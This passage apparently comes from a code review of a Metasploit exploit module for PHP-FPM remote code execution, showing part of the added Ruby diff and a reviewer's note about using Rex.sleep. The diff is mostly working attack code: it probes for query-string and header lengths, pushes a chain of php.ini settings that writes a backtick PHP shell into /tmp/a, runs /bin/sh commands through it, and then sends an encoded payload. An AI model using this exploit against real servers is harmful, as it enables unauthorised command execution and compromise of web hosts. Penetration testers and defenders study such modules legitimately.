modules/exploits/multi/http/php_fpm_rce.rb

```diff
@@ -0,0 +1,440 @@
+      prefix: query_string_prefix
+    )
+    unless res
+      vprint_error("error while setting #{php_setting} for qsl=#{qsl}, customh_length=#{customh_length}")
+    end
+    return res
+  end
+
+  def send_params_detection(qsl_candidates:, customh_length:, detect_method:)
+    php_setting = detect_method.php_option_enable
+    vprint_status("Iterating until the PHP option is enabled (#{php_setting})...")
+    customh_lengths = customh_length ? [customh_length] : (1..datastore['MaxCustomHeaderLength']).to_a
+    qsl_candidates.product(customh_lengths) do |qsl, c_length|
+      res = set_php_setting(php_setting: php_setting, qsl: qsl, customh_length: c_length)
+      unless res
+        vprint_error("Error for qsl=#{qsl}, customh_length=#{c_length}")
+        return nil
+      end
+      if res.code != @base_status
+        vprint_status("Status code #{res.code} for qsl=#{qsl}, customh_length=#{c_length}")
+      end
+      if detect_method.php_option_enabled?(res)
+        php_setting = detect_method.php_option_disable
+        vprint_status("Attack params found, disabling PHP option (#{php_setting})...")
+        set_php_setting(php_setting: php_setting, qsl: qsl, customh_length: c_length)
+        return { qsl: qsl, customh_length: c_length }
+      end
+    end
+    return nil
+  end
+
+  def detect_params(qsl_candidates)
+    customh_length = nil
+    if datastore['CustomHeaderLengthHint']
+      vprint_status(
+        "Using custom header length hint for max length (customh_length="\
+        "#{datastore['CustomHeaderLengthHint']})"
+      )
+      customh_length = datastore['CustomHeaderLengthHint']
+    end
+    detect_method = self.class.detect_methods[datastore['DetectMethod']]
+    return repeat_operation(
+      :send_params_detection,
+      qsl_candidates: qsl_candidates,
+      customh_length: customh_length,
+      detect_method: detect_method
+    )
+  end
+
+  def send_attack_chain
+    [
+      "short_open_tag=1",
+      "html_errors=0",
+      "include_path=/tmp",
+      "auto_prepend_file=a",
+      "log_errors=1",
+      "error_reporting=2",
+      "error_log=/tmp/a",
+      "extension_dir=\"<?=`\"",
+      "extension=\"$_GET[a]`?>\""
+    ].each do |php_setting|
+      vprint_status("Sending php.ini setting: #{php_setting}")
+      res = set_php_setting(
+        php_setting: php_setting,
+        qsl: @params[:qsl],
+        customh_length: @params[:customh_length],
+        query_string_prefix: "a=/bin/sh+-c+'#{CHECK_COMMAND}'%26"
+      )
+      if res
+        return res if res.body.include?(SUCCESS_PATTERN)
+      else
+        print_error("Error when setting #{php_setting}")
+        return nil
+      end
+    end
+    return nil
+  end
+
+  def send_payload
+    disconnect(client) if client&.conn?
+    send_crafted_request(
+      path: '/',
+      qsl: @params[:qsl],
+      customh_length: @params[:customh_length],
+      prefix: "a=#{payload.encoded}%26",
+      allow_retry: false
+    )
+    sleep(1)
```

Comment:
I'm not sure why, but I believe `Rex.sleep` is preferred over `sleep`.

```suggestion
    Rex.sleep(1)
```

Reply:
Addressed in 1b54d27301.